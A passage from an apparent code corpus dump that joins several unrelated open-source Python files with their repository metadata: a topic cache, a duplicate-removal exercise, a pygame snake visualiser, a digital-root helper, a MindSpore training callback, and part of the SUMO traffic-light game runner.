	get_topic_entity_helper_by_id_cache, get_topic_schema_by_id_cache
from .internal_cache import InternalCache
from .pipeline_by_topic_cache import pipeline_by_topic_cache


class TopicCache:
	"""In-memory cache of topics, kept consistent across four views:

	by topic id, by (tenant, name), topic schema by id, and data-entity
	helper by id. Mutations also invalidate the pipeline-by-topic cache.
	"""

	def __init__(self):
		# Four parallel caches; put()/remove() keep them in sync.
		self.byIdCache = InternalCache(cache=get_topic_by_id_cache)
		self.byTenantAndNameCache = InternalCache(cache=get_topic_by_tenant_and_name_cache)
		self.schemaByIdCache = InternalCache(cache=get_topic_schema_by_id_cache)
		self.entityHelperByIdCache = InternalCache(cache=get_topic_entity_helper_by_id_cache)

	# noinspection PyMethodMayBeStatic
	def to_tenant_and_name_key(self, name: str, tenant_id: TenantId) -> str:
		# Composite key: topic names are only unique within a tenant.
		return f'{tenant_id}-{name}'

	def put(self, topic: Topic) -> Optional[Topic]:
		"""Cache ``topic`` in every view; return the previously cached topic, if any."""
		# topic is changed, remove from entity helper cache anyway
		self.entityHelperByIdCache.remove(topic.topicId)
		# refresh other caches
		existing_topic = self.byIdCache.put(topic.topicId, topic)
		self.byTenantAndNameCache.put(
			self.to_tenant_and_name_key(topic.name, topic.tenantId), topic)
		self.schemaByIdCache.put(topic.topicId, TopicSchema(topic))
		return existing_topic

	def put_entity_helper(self, entity_helper: TopicDataEntityHelper) -> Optional[TopicDataEntityHelper]:
		"""Cache an entity helper under its topic's id; return the replaced one, if any."""
		return self.entityHelperByIdCache.put(entity_helper.get_topic().topicId, entity_helper)

	def get(self, topic_id: TopicId) -> Optional[Topic]:
		"""Return the cached topic for ``topic_id``, or None when absent."""
		return self.byIdCache.get(topic_id)

	def get_schema(self, topic_id: TopicId) -> Optional[TopicSchema]:
		"""Return the cached schema for ``topic_id``, or None when absent."""
		return self.schemaByIdCache.get(topic_id)

	def get_entity_helper(self, topic_id: TopicId) -> Optional[TopicDataEntityHelper]:
		"""Return the cached entity helper for ``topic_id``, or None when absent."""
		return self.entityHelperByIdCache.get(topic_id)

	def get_by_name(self, name: str, tenant_id: TenantId) -> Optional[Topic]:
		"""Return the cached topic for (tenant, name), or None when absent."""
		return self.byTenantAndNameCache.get(self.to_tenant_and_name_key(name, tenant_id))

	def remove(self, topic_id: TopicId) -> Optional[Topic]:
		"""Evict ``topic_id`` from every view; return the evicted topic, if any."""
		existing: Optional[Topic] = self.byIdCache.remove(topic_id)
		if existing is not None:
			# Topic is gone, so any pipelines compiled against it are stale too.
			pipeline_by_topic_cache.remove(topic_id)
			self.byTenantAndNameCache.remove(self.to_tenant_and_name_key(existing.name, existing.tenantId))
			self.schemaByIdCache.remove(topic_id)
			self.entityHelperByIdCache.remove(topic_id)
		return existing

	def all(self) -> List[Topic]:
		"""Return every cached topic (snapshot list, not a live view)."""
		return list(self.byIdCache.values())

	def clear(self) -> None:
		"""Drop everything from all views, including the pipeline-by-topic cache."""
		self.byIdCache.clear()
		self.byTenantAndNameCache.clear()
		self.schemaByIdCache.clear()
		self.entityHelperByIdCache.clear()
		pipeline_by_topic_cache.clear()


# Module-level singleton used by the rest of the data kernel.
topic_cache = TopicCache()
40.157143
102
0.811811
c7742d037fbfa87807fd9419663afe8f98d4b927
1,087
py
Python
Beginner/03. Python/remove_duplicates.py
ankita080208/Hacktoberfest
2be849e89285260e7b6672f42979943ad6bbec78
[ "MIT" ]
3
2021-03-16T16:44:04.000Z
2021-06-07T17:32:51.000Z
Beginner/03. Python/remove_duplicates.py
ankita080208/Hacktoberfest
2be849e89285260e7b6672f42979943ad6bbec78
[ "MIT" ]
null
null
null
Beginner/03. Python/remove_duplicates.py
ankita080208/Hacktoberfest
2be849e89285260e7b6672f42979943ad6bbec78
[ "MIT" ]
1
2020-10-26T08:44:01.000Z
2020-10-26T08:44:01.000Z
'''
Given an input of a 2D array of integers, removes all duplicates from the
array (first occurrence wins, scanning rows left to right). Sub-arrays that
end up empty are removed. The input list is modified in place and printed.
'''


def remove_duplicates(all_nums):
    """Remove all duplicate values across a 2D list, in place, then print it.

    Fixes over the original: no module-level ``map`` dict (which shadowed the
    builtin and leaked seen-state between calls), no O(n^2) ``list.remove``
    calls with manual index juggling, no per-value debug prints, and
    initially-empty sub-arrays are now removed as the docstring promises.

    :param all_nums: list of lists of integers; mutated in place
    """
    seen = set()  # values already kept somewhere earlier in the array
    kept_rows = []
    for row in all_nums:
        unique_row = [
            value for value in row
            if value not in seen and not seen.add(value)  # add() returns None
        ]
        if unique_row:  # drop rows that are (or became) empty
            kept_rows.append(unique_row)
    # Replace contents in place so callers holding a reference see the result.
    all_nums[:] = kept_rows
    print(all_nums)


arr = [[1, 2], [2, 2, 2, 2, 2], [2, 3], [4, 5, 2, 2, 2], [3, 3, 3, 4]]
remove_duplicates(arr)
31.970588
101
0.522539
1bfcbe98a563233e76cce2f48c46d13e30ac670b
5,222
py
Python
code/snake/Visualization.py
BogyMitutoyoCTL/AI-Preparation
ef535741816b02e5e63d426a3232a688c9abd726
[ "MIT" ]
1
2020-03-30T09:25:53.000Z
2020-03-30T09:25:53.000Z
code/snake/Visualization.py
BogyMitutoyoCTL/AI-Preparation
ef535741816b02e5e63d426a3232a688c9abd726
[ "MIT" ]
2
2020-02-05T14:00:23.000Z
2020-03-30T19:57:19.000Z
code/snake/Visualization.py
BogyMitutoyoCTL/AI-Preparation
ef535741816b02e5e63d426a3232a688c9abd726
[ "MIT" ]
null
null
null
import pygame
from GameData import GameData
from TrainingData import TrainingData
from Field import Field


class Visualization:
    """PyGame window that renders the snake field plus live text stats.

    Layout (from the hard-coded offsets below): a text column on the left
    (x < 315) and the coloured playing field to its right at (315, 15).
    """

    def __init__(self, pixel_size: int, field: Field):
        # y position of the next text line; reset() rewinds it each frame
        self.current_print_y: int = 0
        # PyGame stuff
        pygame.init()
        pygame.fastevent.init()
        self.clock = pygame.time.Clock()
        # Arbitrary decisions: field cells are square, pixel_size wide/high
        self._pixel_width: int = pixel_size
        self._pixel_height: int = pixel_size
        # Prepare something to show; +380/+40 leaves room for the text column
        self.field: Field = field
        self.window = pygame.display.set_mode((field.width * pixel_size + 380, field.height * pixel_size + 40))
        pygame.display.set_caption('AI Snake @mitutoyoctlg')
        self.font_style = pygame.font.SysFont("Arial", 16)
        self.field_position: tuple = (315, 15)
        self.text_color: list = [255, 255, 255]
        # Cache of the previously drawn field so unchanged cells are skipped
        self.last_field = None

    def tick(self) -> None:
        """Flip the display buffer; tick(0) means uncapped frame rate."""
        self.clock.tick(0)
        pygame.display.flip()

    def reset(self):
        """Rewind the text cursor to the top of the stats column."""
        self.current_print_y = 5

    def _draw_field(self, field: Field, offset=0):
        """Draw the field grid.

        offset == 0 draws the main field (with change-detection against
        last_field); offset > 0 draws an overlay layer shifted and shrunk
        so it appears inset inside the main cells.
        """
        if self.last_field is None:
            self.last_field = Field(field.width, field.height)
            self.last_field.set_all_pixels_to([-1, -1, -1])  # ensures a repaint
        # Background rectangle behind the whole grid
        pygame.draw.rect(self.window, [50, 50, 50],
                         pygame.Rect(self.field_position[0], self.field_position[1],
                                     field.width * self._pixel_width,
                                     field.height * self._pixel_height))
        sizechange = 1 if offset > 0 else 0  # overlay cells are drawn smaller
        for y in range(0, field.height):
            for x in range(0, field.width):
                pixel_color = field.field[y][x]
                if offset == 0:
                    # Skip cells whose colour did not change since last draw
                    if pixel_color == self.last_field.field[y][x]:
                        continue
                left = (x - offset) * self._pixel_width + self.field_position[0] + 1 + sizechange * 5
                top = (y - offset) * self._pixel_height + self.field_position[1] + 1 + sizechange * 5
                width = self._pixel_width - 2 - sizechange * 10
                height = self._pixel_height - 2 - sizechange * 10
                pygame.draw.rect(self.window, pixel_color, pygame.Rect(left, top, width, height))
                # remember the pixel if original field
                if offset == 0:
                    self.last_field.field[y][x] = pixel_color

    def display_visualization_stats(self):
        """Print renderer stats (fps) in green."""
        self.text_color = [0, 255, 0]
        fps = int(self.clock.get_fps())
        self._print_in_window(f"{fps} fps")
        self._print_in_window("")

    def display_training(self, training: TrainingData):
        """Print training progress (epochs, scores, epsilon) in cyan."""
        if training is None:
            return
        self.text_color = [0, 255, 255]
        self._print_in_window(f"Epoch: {training.epoch} / {training.max_epochs}")
        self._print_in_window(f"Steps walked: {training.number_of_steps_walked} / {training.max_number_of_steps}")
        self._print_in_window(f"Best score (snake length): {training.best_score}")
        self._print_in_window(f"Best steps walked: {training.best_steps_walked}")
        self._print_in_window(f"Total training steps (all epochs): {training.total_steps_walked}")
        self._print_in_window(f"Total food eaten (all epochs): {training.total_food_eaten}")
        # round(x * 1000) / 1000 keeps three decimal places
        self._print_in_window(f"Average food eaten (all epochs): {round((training.total_food_eaten / training.epoch) * 1000) / 1000}")
        self._print_in_window(f"ε : {int(training.epsilon * 100)}%")
        self._print_in_window("")

    def display_game(self, info: GameData):
        """Print the current game state (snake, food, walls) in light blue."""
        self.text_color = [128, 128, 255]
        self._print_in_window(f"Snake direction: {info.direction}")
        self._print_in_window(f"Snake head: {info.head_x} , {info.head_y}")
        self._print_in_window(f"Snake length (score): {info.snake_length}")
        self._print_in_window(f"")
        self._print_in_window(f"Food position: {info.food_x} , {info.food_y}")
        self._print_in_window(f"Food direction: {info.food_direction}")
        self._print_in_window(f"Distance to food in steps: {info.food_distance_in_steps}")
        self._print_in_window(f"Air-line distance to food: {info.air_line_distance}")
        self._print_in_window(f"")
        # Wall distances laid out as a compass (N on top, W/E, S below)
        self._print_in_window(f"Wall distances:")
        self._print_in_window(f" {info.walldistance_n}")
        self._print_in_window(f"{info.walldistance_w} {info.walldistance_e}")
        self._print_in_window(f" {info.walldistance_s}")
        self._print_in_window(f"Distance to closest wall: {info.nearest_wall_distance}")
        self._print_in_window(f"Distance to wall in walking direction: {info.distance_to_wall_in_current_direction}")
        self._print_in_window("")
        self._draw_field(info.field)

    def _print_in_window(self, text: str) -> None:
        """Render one line of text at the current cursor and advance it.

        The trailing padding blanks out leftovers of a previously longer
        line (text is rendered with an opaque black background).
        """
        line_distance = 16
        self.current_print_y += line_distance
        pixels = self.font_style.render(text + " ", True, self.text_color, [0, 0, 0])
        self.window.blit(pixels, [5, self.current_print_y])

    def add_layer(self, visualization_field):
        """Draw an extra field as an inset overlay on top of the main grid."""
        if visualization_field is not None:
            self._draw_field(visualization_field, 1)
46.212389
134
0.634623
d3c0698c06fb8aa6e7f973e111326d1789b2d201
308
py
Python
2-resources/_External-learning-resources/02-pyth/python-ds-master/algorithms/math/sumofdigits.py
eengineergz/Lambda
1fe511f7ef550aed998b75c18a432abf6ab41c5f
[ "MIT" ]
null
null
null
2-resources/_External-learning-resources/02-pyth/python-ds-master/algorithms/math/sumofdigits.py
eengineergz/Lambda
1fe511f7ef550aed998b75c18a432abf6ab41c5f
[ "MIT" ]
null
null
null
2-resources/_External-learning-resources/02-pyth/python-ds-master/algorithms/math/sumofdigits.py
eengineergz/Lambda
1fe511f7ef550aed998b75c18a432abf6ab41c5f
[ "MIT" ]
1
2021-11-05T07:48:26.000Z
2021-11-05T07:48:26.000Z
# This is to find the sum of digits of a number until it is a single digit
def sum_of_digits(n):
    """Return (and print) the repeated digit sum (digital root) of ``n``.

    Uses the constant-time congruence formula instead of looping:
    for n > 0 the digital root is 1 + (n - 1) % 9, and it is 0 for n == 0.

    Fixes over the original version:
    - uses the ``n`` parameter instead of ignoring it and reading stdin;
    - returns 0 for n == 0 (the old code printed "9");
    - returns the result (as an int) in addition to printing it.

    :param n: non-negative integer.
    :return: the single-digit digital root of ``n``.
    """
    if n == 0:
        result = 0
    else:
        result = 1 + (n - 1) % 9
    print(result)
    return result
# This method reduces time complexity by a factor of n and also without using any loop
25.666667
86
0.613636
d3c1e06d5da6a9eccf9d261778767e37808ed7c6
4,474
py
Python
official/cv/vit/src/callback.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
77
2021-10-15T08:32:37.000Z
2022-03-30T13:09:11.000Z
official/cv/vit/src/callback.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
3
2021-10-30T14:44:57.000Z
2022-02-14T06:57:57.000Z
official/cv/vit/src/callback.py
leelige/mindspore
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
[ "Apache-2.0" ]
24
2021-10-15T08:32:45.000Z
2022-03-24T18:45:20.000Z
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Training callbacks: per-epoch timing, loss/lr/fps logging and periodic eval."""
import time
import numpy as np
from mindspore.train.callback import Callback
from mindspore.common.tensor import Tensor


class StateMonitor(Callback):
    """MindSpore callback that logs per-epoch stats and runs periodic eval.

    Evaluation runs on epochs where (epoch_num + 1) % eval_interval ==
    eval_offset; results and best-so-far metrics are tracked on the instance.
    eval_engine.get_result() may return a scalar (top-1 accuracy only) or a
    4-element list [top1, top5, i2t_recall, t2i_recall].
    """
    def __init__(self, data_size, tot_batch_size=None, lrs=None,
                 eval_interval=None, eval_offset=None, eval_engine=None,
                 logger=None):
        super(StateMonitor, self).__init__()
        # steps per epoch (used for per-step time and lr indexing)
        self.data_size = data_size
        # global batch size across all devices; enables fps reporting if set
        self.tot_batch_size = tot_batch_size
        # flat learning-rate schedule indexed by global step; optional
        self.lrs = lrs
        self.epoch_num = 0
        self.loss = 0
        self.eval_interval = eval_interval
        self.eval_offset = eval_offset
        self.eval_engine = eval_engine
        # best metrics seen so far; -1 so any real value replaces them
        self.best_acc = -1
        self.best_acc_top5 = -1
        self.best_i2t_recall = -1
        self.best_t2i_recall = -1
        self.mean_fps = 0.0
        # output sink: builtin print unless a logger callable is supplied
        self.print = print
        if logger is not None:
            self.print = logger

    def step_end(self, run_context):
        """Capture the latest loss value from the step's network outputs."""
        cb_params = run_context.original_args()
        loss = cb_params.net_outputs
        # net_outputs may be a (loss, ...) tuple/list; take the first Tensor
        if isinstance(loss, (tuple, list)):
            if isinstance(loss[0], Tensor) and isinstance(loss[0].asnumpy(), np.ndarray):
                loss = loss[0]
        # reduce a Tensor loss to a scalar float
        if isinstance(loss, Tensor) and isinstance(loss.asnumpy(), np.ndarray):
            loss = np.mean(loss.asnumpy())
        self.loss = loss

    def epoch_begin(self, run_context):
        """Record the epoch start time for epoch_end's timing."""
        self.epoch_time = time.time()

    def epoch_end(self, run_context):
        """Log timing/loss/lr/fps for the finished epoch; eval if scheduled."""
        epoch_seconds = (time.time() - self.epoch_time)
        per_step_seconds = epoch_seconds / self.data_size
        print_str = "epoch[{}]".format(self.epoch_num)
        print_str += ', epoch time: {:.2f}s'.format(epoch_seconds)
        print_str += ', per step time: {:.4f}s'.format(per_step_seconds)
        print_str += ', loss={:.6f}'.format(self.loss)
        if self.lrs is not None:
            # lr of the last step of this epoch
            lr = self.lrs[(self.epoch_num + 1) * self.data_size - 1]
            print_str += ', lr={:.6f}'.format(lr)
        if self.tot_batch_size is not None:
            fps = self.tot_batch_size * self.data_size / epoch_seconds
            # running average of fps across all epochs so far
            self.mean_fps = (self.mean_fps * self.epoch_num + fps) / (self.epoch_num + 1)
            print_str += ', fps={:.2f}'.format(fps)
        if (self.epoch_num + 1) % self.eval_interval == self.eval_offset:
            eval_start = time.time()
            self.eval_engine.eval()
            output = self.eval_engine.get_result()
            eval_seconds = time.time() - eval_start
            if output is not None:
                if isinstance(output, list):
                    # [top1, top5, i2t_recall, t2i_recall]
                    print_str += ', top1 accuracy={:.6f}'.format(float(output[0]))
                    print_str += ', top5 accuracy={:.6f}'.format(float(output[1]))
                    print_str += ', i2t_recall={:.6f}'.format(float(output[2]))
                    print_str += ', t2i_recall={:.6f}'.format(float(output[3]))
                    print_str += ', eval_cost={:.2f}'.format(eval_seconds)
                    if float(output[0]) > self.best_acc:
                        self.best_acc = float(output[0])
                    if float(output[1]) > self.best_acc_top5:
                        self.best_acc_top5 = float(output[1])
                    if float(output[2]) > self.best_i2t_recall:
                        self.best_i2t_recall = float(output[2])
                    if float(output[3]) > self.best_t2i_recall:
                        self.best_t2i_recall = float(output[3])
                else:
                    # scalar result: plain accuracy
                    print_str += ', accuracy={:.6f}'.format(float(output))
                    print_str += ', eval_cost={:.2f}'.format(eval_seconds)
                    if float(output) > self.best_acc:
                        self.best_acc = float(output)
        self.print(print_str)
        self.epoch_num += 1
41.045872
89
0.5827
d3d107629e018d079de059c29b5b2649cece9a04
21,159
py
Python
Co-Simulation/Sumo/sumo-1.7.0/tools/game/runner.py
uruzahe/carla
940c2ab23cce1eda1ef66de35f66b42d40865fb1
[ "MIT" ]
4
2020-11-13T02:35:56.000Z
2021-03-29T20:15:54.000Z
Co-Simulation/Sumo/sumo-1.7.0/tools/game/runner.py
uruzahe/carla
940c2ab23cce1eda1ef66de35f66b42d40865fb1
[ "MIT" ]
9
2020-12-09T02:12:39.000Z
2021-02-18T00:15:28.000Z
Co-Simulation/Sumo/sumo-1.7.0/tools/game/runner.py
uruzahe/carla
940c2ab23cce1eda1ef66de35f66b42d40865fb1
[ "MIT" ]
1
2020-11-20T19:31:26.000Z
2020-11-20T19:31:26.000Z
#!/usr/bin/env python
# -*- coding: utf8 -*-
# Eclipse SUMO, Simulation of Urban MObility; see https://eclipse.org/sumo
# Copyright (C) 2010-2020 German Aerospace Center (DLR) and others.
# This program and the accompanying materials are made available under the
# terms of the Eclipse Public License 2.0 which is available at
# https://www.eclipse.org/legal/epl-2.0/
# This Source Code may also be made available under the following Secondary
# Licenses when the conditions for such availability set forth in the Eclipse
# Public License 2.0 are satisfied: GNU General Public License, version 2
# or later which is available at
# https://www.gnu.org/licenses/old-licenses/gpl-2.0-standalone.html
# SPDX-License-Identifier: EPL-2.0 OR GPL-2.0-or-later

# @file    runner.py
# @author  Michael Behrisch
# @author  Jakob Erdmann
# @date    2010-01-30
"""
This script runs the gaming GUI for the LNdW traffic light game.
It checks for possible scenarios in the current working directory and lets
the user start them as a game. Furthermore it saves highscores to local disc
and to the central highscore server.
"""
from __future__ import absolute_import
from __future__ import print_function
import os
import subprocess
import sys
import re
import pickle
import glob
try:
    import Tkinter
except ImportError:
    import tkinter as Tkinter
from optparse import OptionParser
from xml.dom import pulldom
from collections import defaultdict

# Locate SUMO_HOME (two levels up from this script if not set) so that the
# sumolib tools package can be imported.
SUMO_HOME = os.environ.get('SUMO_HOME',
                           os.path.join(os.path.dirname(os.path.abspath(__file__)), '..', '..'))
sys.path.append(os.path.join(SUMO_HOME, 'tools'))
import sumolib  # noqa

# "noupload" on the command line disables highscore upload to the server.
_UPLOAD = False if "noupload" in sys.argv else True
_SCOREFILE = "scores.pkl"  # local highscore persistence (pickle)
if _UPLOAD:
    _TIMEOUT = 5
    _SCORESERVER = "sumo.dlr.de"
    _SCORESCRIPT = "/scores.php?game=TLS&"
_DEBUG = True if "debug" in sys.argv else False
_SCORES = 30  # number of entries kept per highscore category

# UI label translations; keys are scenario/config names plus fixed UI labels.
_LANGUAGE_EN = {'title': 'Interactive Traffic Light',
                'cross': 'Simple Junction',
                'cross_demo': 'Simple Junction (Demo)',
                'square': 'Four Junctions',
                'grid6': 'Six Junctions',
                'kuehne': 'Prof. Kühne',
                'bs3d': '3D Junction Virtual World',
                'bs3Dosm': '3D Junction OpenStreetMap',
                'ramp': 'Highway Ramp',
                'corridor': 'Corridor',
                'A10KW': 'Highway Ramp A10',
                'DRT': 'Demand Responsive Transport (new)',
                'DRT2': 'DRT - Advanced (new)',
                'DRT_demo': 'DRT - Demo',
                'high': 'Highscore',
                'reset': 'Reset Highscore',
                'lang': 'Deutsch',
                'quit': 'Quit',
                'Highscore': 'Highscore',
                'Congratulations': 'Congratulations!',
                'your score': 'Your Score',
                'Continue': 'Continue',
                }
_LANGUAGE_DE = {'title': 'Interaktives Ampelspiel',
                'cross': 'Einfache Kreuzung',
                'cross_demo': 'Einfache Kreuzung (Demo)',
                'square': 'Vier Kreuzungen',
                'grid6': 'Sechs Kreuzungen',
                'kuehne': 'Prof. Kühne',
                'bs3d': '3D Forschungskreuzung Virtuelle Welt',
                'bs3Dosm': '3D Forschungskreuzung OpenStreetMap',
                'ramp': 'Autobahnauffahrt',
                'A10KW': 'A10 KW',
                'DRT': 'Bedarfsbus (neu)',
                'DRT2': 'Bedarfsbus für Fortgeschrittene (neu)',
                'DRT_demo': 'Bedarfsbus - Demo',
                'corridor': 'Strecke',
                'high': 'Bestenliste',
                'reset': 'Bestenliste zurücksetzen',
                'lang': 'Englisch',
                'quit': 'Beenden',
                'Highscore': 'Bestenliste',
                'Congratulations': 'Gratulation!',
                'your score': 'Deine Punkte',
                'Continue': 'Weiter',
                }


def printDebug(*args):
    """Print args on one "DEBUG:" line; no-op unless 'debug' was passed."""
    if _DEBUG:
        print("DEBUG:", end=" ")
        for message in args:
            print(message, end=" ")
        print()


# Upload needs the (Python 2) httplib module; disable upload if unavailable.
if _UPLOAD:
    printDebug("import httplib...")
    try:
        import httplib  # noqa
        printDebug("SUCCESS")
    except ImportError:
        printDebug("FAILED - disabling upload...")
        _UPLOAD = False
if _UPLOAD:
    print("Highscore upload is enabled. To disable call this script with 'noupload' argument.")
else:
    print("Upload is disabled.")


def computeScoreFromWaitingTime(gamename):
    """Score a finished game from its netstate output (less waiting = better).

    Returns (score, totalArrived, complete).  Reads the netstate XML of the
    scenario last started via the global StartDialog instance ``start``;
    the ``gamename`` parameter itself is not used here.
    """
    totalDistance = 0
    totalFuel = 0
    totalArrived = 0
    totalWaitingTime = 0
    complete = True
    for line in open(os.path.join(base, "%s.netstate.xml" % start.category)):
        # an interval shorter than the configured game time means the
        # player quit early -> incomplete run
        m = re.search('<interval begin="0(.00)?" end="([^"]*)"', line)
        if m and float(m.group(2)) != start.gametime:
            print("error: incomplete output")
            complete = False
        m = re.search('sampledSeconds="([^"]*)".*speed="([^"]*)"', line)
        if m:
            totalDistance += float(m.group(1)) * float(m.group(2))
        m = re.search('fuel_abs="([^"]*)"', line)
        if m:
            totalFuel += float(m.group(1))
        m = re.search('arrived="([^"]*)"', line)
        if m:
            totalArrived += float(m.group(1))
        m = re.search('waitingTime="([^"]*)"', line)
        if m:
            totalWaitingTime += float(m.group(1))
    # doing nothing gives a waitingTime of 6033 for cross and 6700 for
    # square
    score = 10000 - totalWaitingTime
    return score, totalArrived, complete


def computeScoreFromTimeLoss(gamename):
    """Score a game from the sumo log's summary statistics.

    Returns (score, totalArrived, complete); (0, 0, False) when the log is
    missing the statistics (simulation did not finish).
    """
    totalArrived = 0
    timeLoss = None
    departDelay = None
    departDelayWaiting = None
    inserted = None
    running = None
    waiting = None
    completed = False
    for line in open(gamename + ".log"):
        if "Simulation ended at time" in line:
            completed = True
        m = re.search('Inserted: ([0-9]*)', line)
        if m:
            inserted = float(m.group(1))
        m = re.search('Running: (.*)', line)
        if m:
            running = float(m.group(1))
        m = re.search('Waiting: (.*)', line)
        if m:
            waiting = float(m.group(1))
        m = re.search('TimeLoss: (.*)', line)
        if m:
            timeLoss = float(m.group(1))
        m = re.search('DepartDelay: (.*)', line)
        if m:
            departDelay = float(m.group(1))
        m = re.search('DepartDelayWaiting: (.*)', line)
        if m:
            departDelayWaiting = float(m.group(1))
    if not completed or timeLoss is None:
        return 0, totalArrived, False
    else:
        totalArrived = inserted - running
        if _DEBUG:
            print("timeLoss=%s departDelay=%s departDelayWaiting=%s inserted=%s running=%s waiting=%s" % (
                timeLoss, departDelay, departDelayWaiting, inserted, running, waiting))
        # penalize average delay per (inserted + still waiting) vehicle
        score = 10000 - int(100 * ((timeLoss + departDelay) * inserted +
                                   departDelayWaiting * waiting) / (inserted + waiting))
        return score, totalArrived, True


def computeScoreDRT(gamename):
    """Score a DRT game from ride waiting times and durations.

    Returns (score, rideCount, complete); (0, 0, False) if no rides exist.
    """
    rideWaitingTime = 0
    rideDuration = 0
    rideStarted = 0
    rideFinished = 0
    tripinfos = gamename + ".tripinfos.xml"
    rideCount = 0
    for ride in sumolib.xml.parse(tripinfos, 'ride'):
        if float(ride.waitingTime) < 0:
            # ride never started: heavy penalty instead of a negative value
            if _DEBUG:
                print("negative waitingTime")
            ride.waitingTime = 10000
        rideWaitingTime += float(ride.waitingTime)
        if float(ride.duration) >= 0:
            rideDuration += float(ride.duration)
            rideStarted += 1
        if float(ride.arrival) >= 0:
            rideFinished += 1
        rideCount += 1
    if rideCount == 0:
        return 0, 0, False
    else:
        avgWT = rideWaitingTime / rideCount
        avgDur = 0 if rideStarted == 0 else rideDuration / rideStarted
        score = 5000 - int(avgWT + avgDur)
        if _DEBUG:
            print("rideWaitingTime=%s rideDuration=%s persons=%s started=%s finished=%s avgWT=%s avgDur=%s" % (
                rideWaitingTime, rideDuration, rideCount, rideStarted, rideFinished, avgWT, avgDur))
        return score, rideCount, True


def computeScoreSquare(gamename):
    """Score the 'square' scenario from tripinfos; emergency vehicles ("ev")
    count their waiting time ten extra times.

    Returns (score, rideCount, complete); (0, 0, False) if no trips exist.
    """
    rideWaitingTime = 0
    rideDuration = 0
    rideStarted = 0
    rideFinished = 0
    tripinfos = gamename + ".tripinfos.xml"
    rideCount = 0
    for ride in sumolib.xml.parse(tripinfos, 'tripinfo'):
        if float(ride.waitingTime) < 0:
            if _DEBUG:
                print("negative waitingTime")
            ride.waitingTime = 10000
        rideWaitingTime += float(ride.waitingTime)
        if ride.vType.startswith("ev"):
            # emergency vehicles are weighted 10x extra
            rideWaitingTime += 10 * float(ride.waitingTime)
        if float(ride.duration) >= 0:
            rideDuration += float(ride.duration)
            rideStarted += 1
        if float(ride.arrival) >= 0:
            rideFinished += 1
        rideCount += 1
    if rideCount == 0:
        return 0, 0, False
    else:
        avgWT = rideWaitingTime / rideCount
        avgDur = 0 if rideStarted == 0 else rideDuration / rideStarted
        score = 1000 - int(avgWT + avgDur)
        if _DEBUG:
            print("rideWaitingTime=%s rideDuration=%s persons=%s started=%s finished=%s avgWT=%s avgDur=%s" % (
                rideWaitingTime, rideDuration, rideCount, rideStarted, rideFinished, avgWT, avgDur))
        return score, rideCount, True


# scenario name -> scoring function; waiting-time scoring is the default
_SCORING_FUNCTION = defaultdict(lambda: computeScoreFromWaitingTime)
_SCORING_FUNCTION.update({
    'A10KW': computeScoreFromTimeLoss,
    'DRT': computeScoreDRT,
    'DRT2': computeScoreDRT,
    'DRT_demo': computeScoreDRT,
    'square': computeScoreSquare,
})


def loadHighscore():
    """Load highscores from the central server, falling back to the local
    pickle file, falling back to an empty table.

    Returns {category: [(name, game, score), ...]} with _SCORES entries.
    """
    if _UPLOAD:
        printDebug("try to load highscore from scoreserver...")
        try:
            conn = httplib.HTTPConnection(_SCORESERVER, timeout=_TIMEOUT)
            conn.request("GET", _SCORESCRIPT + "top=" + str(_SCORES))
            response = conn.getresponse()
            if response.status == httplib.OK:
                scores = {}
                for line in response.read().splitlines():
                    category, values = line.split()
                    # pre-fill with empty sentinel entries
                    scores[category] = _SCORES * [("", "", -1.)]
                    for idx, item in enumerate(values.split(':')):
                        name, game, score = item.split(',')
                        scores[category][idx] = (name, game, int(float(score)))
                printDebug("SUCCESS")
                return scores
        except Exception:
            printDebug("FAILED")
    try:
        return pickle.load(open(_SCOREFILE))
    except Exception:
        pass
    return {}


def parseEndTime(cfg):
    """Return the <end value="..."/> simulation end time from a sumocfg."""
    cfg_doc = pulldom.parse(cfg)
    for event, parsenode in cfg_doc:
        if event == pulldom.START_ELEMENT and parsenode.localName == 'end':
            return float(parsenode.getAttribute('value'))


class IMAGE:
    # namespace for the PhotoImage objects loaded at startup (see bottom)
    pass


class StartDialog(Tkinter.Frame):
    """Main menu: one start + highscore button per *.sumocfg scenario."""

    def __init__(self, parent, lang):
        Tkinter.Frame.__init__(self, parent)
        # variables for changing language
        self.parent = parent
        self._language_text = lang
        self.buttons = []
        # misc variables
        self.name = ''
        # setup gui
        self.parent.title(self._language_text['title'])
        self.parent.minsize(250, 50)
        self.category = None

        # we use a grid layout with 4 columns
        COL_DLRLOGO, COL_START, COL_HIGH, COL_SUMOLOGO = range(4)
        # there is one column for every config, +2 more columns for control
        # buttons
        configs = sorted(glob.glob(os.path.join(base, "*.sumocfg")))
        numButtons = len(configs) + 3
        # button dimensions
        bWidth_start = 30
        bWidth_high = 10
        bWidth_control = 41

        self.gametime = 0
        self.ret = 0
        # some pretty images
        Tkinter.Label(self, image=IMAGE.dlrLogo).grid(
            row=0, rowspan=numButtons, column=COL_DLRLOGO)
        Tkinter.Label(self, image=IMAGE.sumoLogo).grid(
            row=0, rowspan=numButtons, column=COL_SUMOLOGO)

        # 2 button for each config (start, highscore)
        for row, cfg in enumerate(configs):
            # 3D scenarios need the OSG build of sumo
            if "bs3" in cfg and not haveOSG:
                continue
            category = self.category_name(cfg)
            # lambda must make a copy of cfg argument
            button = Tkinter.Button(self, width=bWidth_start,
                                    command=lambda cfg=cfg: self.start_cfg(cfg))
            self.addButton(button, category)
            button.grid(row=row, column=COL_START)

            button = Tkinter.Button(self, width=bWidth_high,
                                    command=lambda cfg=cfg: ScoreDialog(self, [], None,
                                                                        self.category_name(cfg),
                                                                        self._language_text))  # .grid(row=row, column=COL_HIGH)
            self.addButton(button, 'high')
            button.grid(row=row, column=COL_HIGH)

        # control buttons
        button = Tkinter.Button(
            self, width=bWidth_control, command=high.clear)
        self.addButton(button, 'reset')
        button.grid(row=numButtons - 3, column=COL_START, columnspan=2)

        button = Tkinter.Button(
            self, width=bWidth_control, command=sys.exit)
